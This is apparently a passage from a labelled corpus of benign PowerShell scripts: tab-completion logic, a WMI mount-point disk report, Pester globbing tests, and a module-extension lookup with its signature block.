$global:_snapin = $(Get-PSSnapIn -Registered;Get-PSSnapIn)| sort Name -Unique;
$global:_snapin -like $_opt | % { $_base + $_ }
break;
}
}
if ( "Clear-Variable", "Export-Alias", "Get-Alias", "Get-PSDrive", "Get-Variable", "Import-Alias",
"New-Alias", "New-PSDrive", "New-Variable", "Remove-Variable", "Set-Alias", "Set-Variable" `
-contains $_cmdlet.Name -and "Scope" -like $_param )
{
"Global", "Local", "Script" -like $_opt
break;
}
if ( "Get-Process", "Stop-Process", "Wait-Process" -contains $_cmdlet.Name -and "Name" -like $_param )
{
Get-Process $_opt | % { $_.Name } | sort | % { $_base + ($_ -replace '\\s','` ') }
break;
}
if ( "Get-Eventlog" -eq $_cmdlet.Name -and "LogName" -like $_param )
{
Get-EventLog -List | ? { $_.Log -like $_opt } | % { $_base + ($_.Log -replace '\\s','` ') }
break;
}
if ( "Get-Help" -eq $_cmdlet.Name )
{
if ( "Name" -like $_param )
{
Get-Help -Category all -Name $_opt | % { $_.Name } | sort -Unique
break;
}
if ( "Category" -like $_param )
{
"Alias", "Cmdlet", "Provider", "General", "FAQ",
"Glossary", "HelpFile", "All" -like $_opt | sort | % { $_base + $_ }
break;
}
}
if ( "Get-Service", "Restart-Service", "Resume-Service",
"Start-Service", "Stop-Service", "Suspend-Service" `
-contains $_cmdlet.Name )
{
if ( "Name" -like $_param )
{
Get-Service -Name $_opt | sort Name | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "DisplayName" -like $_param )
{
Get-Service -Name $_opt | sort DisplayName | % { $_base + ($_.DisplayName -replace '\\s','` ') }
break;
}
}
if ( "New-Service" -eq $_cmdlet.Name -and "dependsOn" -like $_param )
{
Get-Service -Name $_opt | sort Name | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "Get-EventLog" -eq $_cmdlet.Name -and "EntryType" -like $_param )
{
"Error", "Information", "FailureAudit", "SuccessAudit", "Warning" -like $_opt | sort | % { $_base + $_ }
break;
}
if ( "Get-Command" -eq $_cmdlet.Name -and "Name" -like $_param )
{
Get-Command -CommandType All -Name $_opt | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( $_cmdlet.Noun -like "*WMI*" )
{
if ( "Class" -like $_param )
{
Write-ClassNames $_WMIClasses ($_opt.Split("_").Count-1) -sep '_'
break;
}
}
if ( "Format-List", "Format-Custom", "Format-Table", "Format-Wide", "Compare-Object",
"ConvertTo-Html", "Measure-Object", "Select-Object", "Group-Object", "Sort-Object" `
-contains $_cmdlet.Name -and "Property" -like $_param )
{
Get-PipeLineObject
$_dummy | Get-Member -Name $_opt -MemberType Properties,ParameterizedProperty | sort membertype | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "Select-Object" -eq $_cmdlet.Name )
{
if ( "ExcludeProperty" -like $_param )
{
Get-PipeLineObject
$_dummy | Get-Member -Name $_opt -MemberType Properties,ParameterizedProperty | sort membertype | % { $_base + ($_.Name -replace '\\s','` ') }
break;
}
if ( "ExpandProperty" -like $_param )
{
Get-PipeLineObject
$_dummy | Get-Member -Name $_opt -MemberType Properties,ParameterizedProperty | sort membertype | % { $_.Name }
break;
}
}
select -InputObject $_cmdlet -ExpandProperty ParameterSets | select -ExpandProperty Parameters |
? { $_.Name -like $_param } | ? { $_.ParameterType.IsEnum } |
% { [Enum]::GetNames($_.ParameterType) } | ? { $_ -like $_opt } | sort -Unique | % { $_base + $_ }
}
# parse the script...
$_tokens = [System.Management.Automation.PSParser]::Tokenize($line, [ref] $null)
if ($_tokens)
{
$_lastToken = $_tokens[$_tokens.count - 1]
if ($_lastToken.Type -eq 'Command')
{
$_cmd = $_lastToken.Content
# don't look for paths...
if ($_cmd.IndexOfAny('/\\') -eq -1)
{
# handle parsing errors - the last token string should be the last
# string in the line...
if ($lastword.substring($lastword.length-$_cmd.length) -eq $_cmd)
{
$_pat = $_cmd + '*'
$_base = $lastword.substring(0, $lastword.length-$_cmd.length)
"begin {", "break", "catch {", "continue", "data {", "do {", "dynamicparam (", "else {", "elseif (",
"end {", "exit", "filter ", "finally {", "for (", "foreach ", "from", "function ", "if (", "in ",
"param (", "process {", "return", "switch ", "throw ", "trap ", "try {", "until (", "while (" `
-like $_pat | % {'{0}{1}' -f $_base,$_ }
$ExecutionContext.InvokeCommand.GetCommandName($_pat,$true, $false) |
Sort-Object -Unique | ForEach-Object {'{0}{1}' -f $_base,$_ }
}
}
}
}
}
}
}
}
|
combined_dataset/train/non-malicious/Get-MountPointData.ps1
|
Get-MountPointData.ps1
|
# Convert from one device ID format to another.
function Get-DeviceIDFromMP {
param([Parameter(Mandatory=$true)][string] $VolumeString,
[Parameter(Mandatory=$true)][string] $Directory)
if ($VolumeString -imatch '^\\s*Win32_Volume\\.DeviceID="([^"]+)"\\s*$') {
# Return it in the wanted format.
$Matches[1] -replace '\\\\{2}', '\\'
}
else {
# Return a presumably unique hashtable key if there's no match.
"Unknown device ID for " + $Directory
}
}
function Get-MountPointData {
param([Parameter(Mandatory=$true)][string[]] $ComputerName,
#[switch] $DoNotExcludeDefaults,
[switch] $IncludeRootDrives
)
foreach ($Computer in $ComputerName) {
try {
# Collect mount point device IDs and populate a hashtable with IDs as keys
$MountPointData = @{}
Get-WmiObject Win32_MountPoint -ComputerName $Computer |
Where { if ($IncludeRootDrives) { $true } else { $_.Directory -NotMatch '^\\s*Win32_Directory\\.Name="[a-z]:\\\\{2}"\\s*$' } } | ForEach-Object {
$MountPointData.(Get-DeviceIDFromMP $_.Volume $_.Directory) = $_.Directory
}
$Volumes = Get-WmiObject Win32_Volume -ComputerName $Computer | Where {
if ($IncludeRootDrives) { $true } else { -not $_.DriveLetter }
} |
Select-Object Label, Caption, Capacity, FreeSpace, FileSystem, DeviceID, @{n='Computer';e={$Computer}}
}
catch {
Write-Host -Fore Red "Terminating WMI error for ${Computer} (skipping): $($Error[0])"
continue
}
if (-not $Volumes) {
Write-Host -Fore Red "No mount points found on $Computer. Skipping..."
continue
}
$Volumes | ForEach-Object {
if ($MountPointData.ContainsKey($_.DeviceID)) {
if ($_.Capacity) { $PercentFree = $_.FreeSpace*100/$_.Capacity }
else { $PercentFree = 0 }
$_ | Select-Object Computer, Label, Caption, FileSystem, @{n='Size (GB)';e={$_.Capacity/1GB}},
@{n='Free space';e={($_.FreeSpace/1GB).ToString('N')}}, @{n='Percent free';e={$PercentFree}}
}
} | Sort-Object -Property 'Percent free', @{Descending=$true;e={$_.'Size (GB)'}}, Label, Caption |
Select-Object Computer, Label, Caption, FileSystem, @{n='Size (GB)';e={$_.'Size (GB)'.ToString('N')}},
'Free space', @{n='Percent free';e={$_.'Percent free'.ToString('N')}}
}
}
|
combined_dataset/train/non-malicious/2104.ps1
|
2104.ps1
|
Describe 'Native UNIX globbing tests' -tags "CI" {
BeforeAll {
if (-Not $IsWindows )
{
"" > "$TESTDRIVE/abc.txt"
"" > "$TESTDRIVE/bbb.txt"
"" > "$TESTDRIVE/cbb.txt"
}
$defaultParamValues = $PSDefaultParameterValues.Clone()
$PSDefaultParameterValues["it:skip"] = $IsWindows
}
AfterAll {
$global:PSDefaultParameterValues = $defaultParamValues
}
It 'The globbing pattern *.txt should match 3 files' {
(/bin/ls $TESTDRIVE/*.txt).Length | Should -Be 3
}
It 'The globbing pattern *b.txt should match 2 files whose basenames end in "b"' {
(/bin/ls $TESTDRIVE/*b.txt).Length | Should -Be 2
}
It 'The globbing pattern should match 2 files whose names start with either "a" or "b"' {
(/bin/ls $TESTDRIVE/[ab]*.txt).Length | Should -Be 2
}
It 'Globbing abc.* should return one file name "abc.txt"' {
/bin/ls $TESTDRIVE/abc.* | Should -Match "abc.txt"
}
It 'Globbing [cde]b?.* should return one file name "cbb.txt"' {
/bin/ls $TESTDRIVE/[cde]b?.* | Should -Match "cbb.txt"
}
It 'Globbing should work with unquoted expressions' {
$v = "$TESTDRIVE/abc*"
/bin/ls $v | Should -Match "abc.txt"
$h = [pscustomobject]@{P=$v}
/bin/ls $h.P | Should -Match "abc.txt"
$a = $v,$v
/bin/ls $a[1] | Should -Match "abc.txt"
}
It 'Should not normalize absolute paths' {
$matches = /bin/echo /etc/*
$matches.substring(0,5) | Should Be '/etc/'
}
It 'Globbing should not happen with quoted expressions' {
$v = "$TESTDRIVE/abc*"
/bin/echo "$v" | Should -BeExactly $v
/bin/echo '$v' | Should -BeExactly '$v'
}
It 'Should return the original pattern (<arg>) if there are no matches' -TestCases @(
@{arg = '/nOSuCH*file'},
@{arg = '/bin/nOSuCHdir/*'},
@{arg = '-NosUch*fIle'},
@{arg = '-nOsuCh*drive:nosUch*fIle'},
@{arg = '-nOs[u]ChdrIve:nosUch*fIle'},
@{arg = '-nOsuChdRive:nosUch*fIle'},
@{arg = '-nOsuChdRive: nosUch*fIle'},
@{arg = '/no[suchFilE'},
@{arg = '[]'}
) {
param($arg)
/bin/echo $arg | Should -BeExactly $arg
}
$quoteTests = @(
@{arg = '"*"'},
@{arg = "'*'"}
)
It 'Should not expand quoted strings: <arg>' -TestCases $quoteTests {
param($arg)
Invoke-Expression "/bin/echo $arg" | Should -BeExactly '*'
}
It 'Should not expand quoted strings via splat array: <arg>' -TestCases $quoteTests -Skip {
param($arg)
function Invoke-Echo
{
/bin/echo @args
}
Invoke-Expression "Invoke-Echo $arg" | Should -BeExactly '*'
}
It 'Should not expand quoted strings via splat hash: <arg>' -TestCases $quoteTests -Skip {
param($arg)
function Invoke-Echo($quotedArg)
{
/bin/echo @PSBoundParameters
}
Invoke-Expression "Invoke-Echo -quotedArg:$arg" | Should -BeExactly "-quotedArg:*"
Invoke-Expression "Invoke-Echo -quotedArg: $arg" | Should -BeExactly "-quotedArg:*"
}
It 'Should not expand patterns on non-filesystem drives' {
/bin/echo env:ps* | Should -BeExactly "env:ps*"
}
It 'Globbing filenames with spaces should match 2 files' {
"" > "$TESTDRIVE/foo bar.txt"
"" > "$TESTDRIVE/foo baz.txt"
(/bin/ls $TESTDRIVE/foo*.txt).Length | Should -Be 2
}
It 'Tilde should be replaced by the filesystem provider home directory' {
/bin/echo ~ | Should -BeExactly ($executioncontext.SessionState.Provider.Get("FileSystem").Home)
}
It '~/foo should be replaced by the <filesystem provider home directory>/foo' {
/bin/echo ~/foo | Should -BeExactly "$($executioncontext.SessionState.Provider.Get("FileSystem").Home)/foo"
}
It '~ should not be replaced when quoted' {
/bin/echo '~' | Should -BeExactly '~'
/bin/echo "~" | Should -BeExactly '~'
/bin/echo '~/foo' | Should -BeExactly '~/foo'
/bin/echo "~/foo" | Should -BeExactly '~/foo'
}
}
|
combined_dataset/train/non-malicious/sample_13_60.ps1
|
sample_13_60.ps1
|
function Get-ModuleExtension {
[CmdletBinding()]
param(
[string]
$ModuleName,
[Version]
$ModuleVersion
)
$modules = Get-Module -ListAvailable
Write-Verbose "`nFound $($modules.Length) installed modules to scan for extensions."
function ParseVersion($versionString) {
$parsedVersion = $null
if ($versionString) {
# We're targeting Semantic Versioning 2.0 so make sure the version has
# at least 3 components (X.X.X). This logic ensures that the "patch"
# (third) component has been specified.
$versionParts = $versionString.Split('.');
if ($versionParts.Length -lt 3) {
$versionString = "$versionString.0"
}
if ($PSVersionTable.PSEdition -eq "Core") {
$parsedVersion = New-Object -TypeName "System.Management.Automation.SemanticVersion" -ArgumentList $versionString
}
else {
$parsedVersion = New-Object -TypeName "System.Version" -ArgumentList $versionString
}
}
return $parsedVersion
}
foreach ($module in $modules) {
if ($module.PrivateData -and
$module.PrivateData.PSData -and
$module.PrivateData.PSData.Extensions) {
Write-Verbose "Found module with extensions: $($module.Name)"
foreach ($extension in $module.PrivateData.PSData.Extensions) {
Write-Verbose "Comparing against module extension: $($extension.Module)"
$minimumVersion = ParseVersion $extension.MinimumVersion
$maximumVersion = ParseVersion $extension.MaximumVersion
if (($extension.Module -eq $ModuleName) -and
(!$minimumVersion -or $ModuleVersion -ge $minimumVersion) -and
(!$maximumVersion -or $ModuleVersion -le $maximumVersion)) {
# Return a new object with the extension information
[PSCustomObject]@{
Module = $module
MinimumVersion = $minimumVersion
MaximumVersion = $maximumVersion
Details = $extension.Details
}
}
}
}
}
}
# SIG # Begin signature block
# MIIreQYJKoZIhvcNAQcCoIIrajCCK2YCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCC1gUALixEIY0qf
# kI1wXSoJ9zNQIXpPv6vgxoqZP0jAcKCCEW4wggh+MIIHZqADAgECAhM2AAAB33OB
# lxa+Mv0NAAIAAAHfMA0GCSqGSIb3DQEBCwUAMEExEzARBgoJkiaJk/IsZAEZFgNH
# QkwxEzARBgoJkiaJk/IsZAEZFgNBTUUxFTATBgNVBAMTDEFNRSBDUyBDQSAwMTAe
# Fw0yNDAxMjAwMTMzNDRaFw0yNTAxMTkwMTMzNDRaMCQxIjAgBgNVBAMTGU1pY3Jv
# c29mdCBBenVyZSBDb2RlIFNpZ24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
# AoIBAQDVucAmkbIWpspYysyydQyyRh2L8q5igYFcy2vDk8xGvVMRBhxwbOsJIEd0
# wY8N7WU/xgkYMnSsM4vmc2B49DGdrAjSJqbsx0zf+DLFjrBITUecdRhlq0VKGX8U
# bVOkg0aIfFNLRs4DSrCZYh26zyB8qkL/jUmB7DhcBEhhgOlXRQ4LHnUv7qf+iXqD
# uwFz9tUTAh8JGsgLRBK0oSsRfUB+FJF2KyUxzmeFXJKiEynsWz4kqoM91ag1Yw0U
# 8d0e+RgAKi3Ft1cXA+3qKM6I1H11e/NdIjh7oThvrBtfEngwlwbTF3KZOHdhLBFZ
# 18U4v8VeTlb4r94346CY2+SKnQa7AgMBAAGjggWKMIIFhjApBgkrBgEEAYI3FQoE
# HDAaMAwGCisGAQQBgjdbAQEwCgYIKwYBBQUHAwMwPQYJKwYBBAGCNxUHBDAwLgYm
# KwYBBAGCNxUIhpDjDYTVtHiE8Ys+hZvdFs6dEoFgg93NZoaUjDICAWQCAQ4wggJ2
# BggrBgEFBQcBAQSCAmgwggJkMGIGCCsGAQUFBzAChlZodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpaW5mcmEvQ2VydHMvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1F
# JTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBSBggrBgEFBQcwAoZGaHR0cDovL2NybDEu
# YW1lLmdibC9haWEvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUy
# MDAxKDIpLmNydDBSBggrBgEFBQcwAoZGaHR0cDovL2NybDIuYW1lLmdibC9haWEv
# QlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBS
# BggrBgEFBQcwAoZGaHR0cDovL2NybDMuYW1lLmdibC9haWEvQlkyUEtJQ1NDQTAx
# LkFNRS5HQkxfQU1FJTIwQ1MlMjBDQSUyMDAxKDIpLmNydDBSBggrBgEFBQcwAoZG
# aHR0cDovL2NybDQuYW1lLmdibC9haWEvQlkyUEtJQ1NDQTAxLkFNRS5HQkxfQU1F
# JTIwQ1MlMjBDQSUyMDAxKDIpLmNydDCBrQYIKwYBBQUHMAKGgaBsZGFwOi8vL0NO
# PUFNRSUyMENTJTIwQ0ElMjAwMSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2Vy
# dmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1BTUUsREM9R0JM
# P2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0
# aG9yaXR5MB0GA1UdDgQWBBSO7i0qme7tjtjFjyuIjlmGM6cbCTAOBgNVHQ8BAf8E
# BAMCB4AwRQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3Jh
# dGlvbjEWMBQGA1UEBRMNMjM2MTY3KzUwMTk3MDCCAeYGA1UdHwSCAd0wggHZMIIB
# 1aCCAdGgggHNhj9odHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpaW5mcmEvQ1JM
# L0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwxLmFtZS5nYmwv
# Y3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwyLmFtZS5n
# YmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmwzLmFt
# ZS5nYmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGMWh0dHA6Ly9jcmw0
# LmFtZS5nYmwvY3JsL0FNRSUyMENTJTIwQ0ElMjAwMSgyKS5jcmyGgb1sZGFwOi8v
# L0NOPUFNRSUyMENTJTIwQ0ElMjAwMSgyKSxDTj1CWTJQS0lDU0NBMDEsQ049Q0RQ
# LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp
# Z3VyYXRpb24sREM9QU1FLERDPUdCTD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0
# P2Jhc2U/b2JqZWN0Q2xhc3M9Y1JMRGlzdHJpYnV0aW9uUG9pbnQwHwYDVR0jBBgw
# FoAUllGE4Gtve/7YBqvD8oXmKa5q+dQwHwYDVR0lBBgwFgYKKwYBBAGCN1sBAQYI
# KwYBBQUHAwMwDQYJKoZIhvcNAQELBQADggEBAJe/YXNSCoXitLf/X5pfJZpep3cs
# jdqmBgg+8Kr++8XMjWwdm4tiLasJMUPCgmp5NYn3wC4GefGYwfF7Xm2FMSR2i6QU
# HjigGu6BjdWQh4EwGaNqXLkXlUM7Ww2Z0KrRtpCL16DCOTNZuCFPAytSHFskPWrr
# 6q3EBuiM6P5VLgFSKiAxcunldJorbrBrvZSZib1OINzFGAQszUR0ytovW6FOp+uo
# VhiQCqnOheC1ppnZPss7vnXoogyO0xgSW40bRlltGfwnlOd3IZ/43ZOj5XeeShg5
# 2SzVEiyYrZjD17MSNzQM1JKI07+mtAC7D+eZ/+g2pM/91oHcrDq9Nq4QrS0wggjo
# MIIG0KADAgECAhMfAAAAUeqP9pxzDKg7AAAAAABRMA0GCSqGSIb3DQEBCwUAMDwx
# EzARBgoJkiaJk/IsZAEZFgNHQkwxEzARBgoJkiaJk/IsZAEZFgNBTUUxEDAOBgNV
# BAMTB2FtZXJvb3QwHhcNMjEwNTIxMTg0NDE0WhcNMjYwNTIxMTg1NDE0WjBBMRMw
# EQYKCZImiZPyLGQBGRYDR0JMMRMwEQYKCZImiZPyLGQBGRYDQU1FMRUwEwYDVQQD
# EwxBTUUgQ1MgQ0EgMDEwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDJ
# mlIJfQGejVbXKpcyFPoFSUllalrinfEV6JMc7i+bZDoL9rNHnHDGfJgeuRIYO1LY
# /1f4oMTrhXbSaYRCS5vGc8145WcTZG908bGDCWr4GFLc411WxA+Pv2rteAcz0eHM
# H36qTQ8L0o3XOb2n+x7KJFLokXV1s6pF/WlSXsUBXGaCIIWBXyEchv+sM9eKDsUO
# LdLTITHYJQNWkiryMSEbxqdQUTVZjEz6eLRLkofDAo8pXirIYOgM770CYOiZrcKH
# K7lYOVblx22pdNawY8Te6a2dfoCaWV1QUuazg5VHiC4p/6fksgEILptOKhx9c+ia
# piNhMrHsAYx9pUtppeaFAgMBAAGjggTcMIIE2DASBgkrBgEEAYI3FQEEBQIDAgAC
# MCMGCSsGAQQBgjcVAgQWBBQSaCRCIUfL1Gu+Mc8gpMALI38/RzAdBgNVHQ4EFgQU
# llGE4Gtve/7YBqvD8oXmKa5q+dQwggEEBgNVHSUEgfwwgfkGBysGAQUCAwUGCCsG
# AQUFBwMBBggrBgEFBQcDAgYKKwYBBAGCNxQCAQYJKwYBBAGCNxUGBgorBgEEAYI3
# CgMMBgkrBgEEAYI3FQYGCCsGAQUFBwMJBggrBgEFBQgCAgYKKwYBBAGCN0ABAQYL
# KwYBBAGCNwoDBAEGCisGAQQBgjcKAwQGCSsGAQQBgjcVBQYKKwYBBAGCNxQCAgYK
# KwYBBAGCNxQCAwYIKwYBBQUHAwMGCisGAQQBgjdbAQEGCisGAQQBgjdbAgEGCisG
# AQQBgjdbAwEGCisGAQQBgjdbBQEGCisGAQQBgjdbBAEGCisGAQQBgjdbBAIwGQYJ
# KwYBBAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMBIGA1UdEwEB/wQI
# MAYBAf8CAQAwHwYDVR0jBBgwFoAUKV5RXmSuNLnrrJwNp4x1AdEJCygwggFoBgNV
# HR8EggFfMIIBWzCCAVegggFToIIBT4YxaHR0cDovL2NybC5taWNyb3NvZnQuY29t
# L3BraWluZnJhL2NybC9hbWVyb290LmNybIYjaHR0cDovL2NybDIuYW1lLmdibC9j
# cmwvYW1lcm9vdC5jcmyGI2h0dHA6Ly9jcmwzLmFtZS5nYmwvY3JsL2FtZXJvb3Qu
# Y3JshiNodHRwOi8vY3JsMS5hbWUuZ2JsL2NybC9hbWVyb290LmNybIaBqmxkYXA6
# Ly8vQ049YW1lcm9vdCxDTj1BTUVSb290LENOPUNEUCxDTj1QdWJsaWMlMjBLZXkl
# MjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPUFNRSxE
# Qz1HQkw/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNz
# PWNSTERpc3RyaWJ1dGlvblBvaW50MIIBqwYIKwYBBQUHAQEEggGdMIIBmTBHBggr
# BgEFBQcwAoY7aHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraWluZnJhL2NlcnRz
# L0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUHMAKGK2h0dHA6Ly9jcmwyLmFt
# ZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUHMAKGK2h0dHA6
# Ly9jcmwzLmFtZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQwNwYIKwYBBQUH
# MAKGK2h0dHA6Ly9jcmwxLmFtZS5nYmwvYWlhL0FNRVJvb3RfYW1lcm9vdC5jcnQw
# gaIGCCsGAQUFBzAChoGVbGRhcDovLy9DTj1hbWVyb290LENOPUFJQSxDTj1QdWJs
# aWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9u
# LERDPUFNRSxEQz1HQkw/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNl
# cnRpZmljYXRpb25BdXRob3JpdHkwDQYJKoZIhvcNAQELBQADggIBAFAQI7dPD+jf
# XtGt3vJp2pyzA/HUu8hjKaRpM3opya5G3ocprRd7vdTHb8BDfRN+AD0YEmeDB5HK
# QoG6xHPI5TXuIi5sm/LeADbV3C2q0HQOygS/VT+m1W7a/752hMIn+L4ZuyxVeSBp
# fwf7oQ4YSZPh6+ngZvBHgfBaVz4O9/wcfw91QDZnTgK9zAh9yRKKls2bziPEnxeO
# ZMVNaxyV0v152PY2xjqIafIkUjK6vY9LtVFjJXenVUAmn3WCPWNFC1YTIIHw/mD2
# cTfPy7QA1pT+GPARAKt0bKtq9aCd/Ym0b5tPbpgCiRtzyb7fbNS1dE740re0COE6
# 7YV2wbeo2sXixzvLftH8L7s9xv9wV+G22qyKt6lmKLjFK1yMw4Ni5fMabcgmzRvS
# jAcbqgp3tk4a8emaaH0rz8MuuIP+yrxtREPXSqL/C5bzMzsikuDW9xH10graZzSm
# PjilzpRfRdu20/9UQmC7eVPZ4j1WNa1oqPHfzET3ChIzJ6Q9G3NPCB+7KwX0OQmK
# yv7IDimj8U/GlsHD1z+EF/fYMf8YXG15LamaOAohsw/ywO6SYSreVW+5Y0mzJutn
# BC9Cm9ozj1+/4kqksrlhZgR/CSxhFH3BTweH8gP2FEISRtShDZbuYymynY1un+Ry
# fiK9+iVTLdD1h/SxyxDpZMtimb4CgJQlMYIZYTCCGV0CAQEwWDBBMRMwEQYKCZIm
# iZPyLGQBGRYDR0JMMRMwEQYKCZImiZPyLGQBGRYDQU1FMRUwEwYDVQQDEwxBTUUg
# Q1MgQ0EgMDECEzYAAAHfc4GXFr4y/Q0AAgAAAd8wDQYJYIZIAWUDBAIBBQCgga4w
# GQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEOMAwGCisG
# AQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEILGxK7boYpThklKcsgIvPmyAm1AkbjnD
# wNN9YEHygxcqMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8AcwBvAGYA
# dKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEBBQAEggEA
# 1U91VLaAD4E6K4iZx3LJYyOC+OEgU94IHcXVK9NUaUeIjquWem12U5DeG67+VQ+e
# WmzdTGuO5jdANQJRFADiAGJlmiIvJtRP5seJcQd0/dhJJnDQ+rIjBHgIamWCwjRl
# +yPDoXHRCAiqXMxUm7awGXV7YnkipTUyF/UzASe6aiVl6vsEty0zcuGbX9bV1UD5
# fOOodq/x2dkSw6Oi7fHxYWumTTH+an9hLGNoMB1zv6UQ0uV7rbU9Z2TkWuMXBbsg
# a6TXCKsND5MLmQyTu5ugtNJtHRlEPjImbnTh23u64UxRvDeD10lmKQVn2glKmv0X
# 1H4dDbJ9EjM34hceYPSIbaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCCFxEGCSqG
# SIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsqhkiG9w0B
# CRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFlAwQCAQUA
# BCCn0AmIocfDdc9vq2J5YkxLLTtoia0z9P2IPwc78vhJLgIGZfxwKidaGBMyMDI0
# MDQwMzIxMzQwNS4wMDZaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJVUzETMBEG
# A1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWlj
# cm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBP
# cGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNOOjA4NDIt
# NEJFNi1DMjlBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl
# oIIReDCCBycwggUPoAMCAQICEzMAAAHajtXJWgDREbEAAQAAAdowDQYJKoZIhvcN
# AQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNV
# BAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG
# A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMxMDEyMTkw
# NjU5WhcNMjUwMTEwMTkwNjU5WjCB0jELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldh
# c2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBD
# b3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3BlcmF0aW9u
# cyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjowODQyLTRCRTYtQzI5
# QTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCCAiIwDQYJ
# KoZIhvcNAQEBBQADggIPADCCAgoCggIBAJOQBgh2tVFR1j8jQA4NDf8bcVrXSN08
# 0CNKPSQo7S57sCnPU0FKF47w2L6qHtwm4EnClF2cruXFp/l7PpMQg25E7X8xDmvx
# r8BBE6iASAPCfrTebuvAsZWcJYhy7prgCuBf7OidXpgsW1y8p6Vs7sD2aup/0uve
# YxeXlKtsPjMCplHkk0ba+HgLho0J68Kdji3DM2K59wHy9xrtsYK+X9erbDGZ2mmX
# 3765aS5Q7/ugDxMVgzyj80yJn6ULnknD9i4kUQxVhqV1dc/DF6UBeuzfukkMed7t
# rzUEZMRyla7qhvwUeQlgzCQhpZjz+zsQgpXlPczvGd0iqr7lACwfVGog5plIzdEx
# vt1TA8Jmef819aTKwH1IVEIwYLA6uvS8kRdA6RxvMcb//ulNjIuGceyykMAXEynV
# rLG9VvK4rfrCsGL3j30Lmidug+owrcCjQagYmrGk1hBykXilo9YB8Qyy5Q1KhGuH
# 65V3zFy8a0kwbKBRs8VR4HtoPYw9z1DdcJfZBO2dhzX3yAMipCGm6SmvmvavRsXh
# y805jiApDyN+s0/b7os2z8iRWGJk6M9uuT2493gFV/9JLGg5YJJCJXI+yxkO/OXn
# ZJsuGt0+zWLdHS4XIXBG17oPu5KsFfRTHREloR2dI6GwaaxIyDySHYOtvIydla7u
# 4lfnfCjY/qKTAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQUoXyNyVE9ZhOVizEUVwhN
# gL8PX0UwHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYDVR0fBFgw
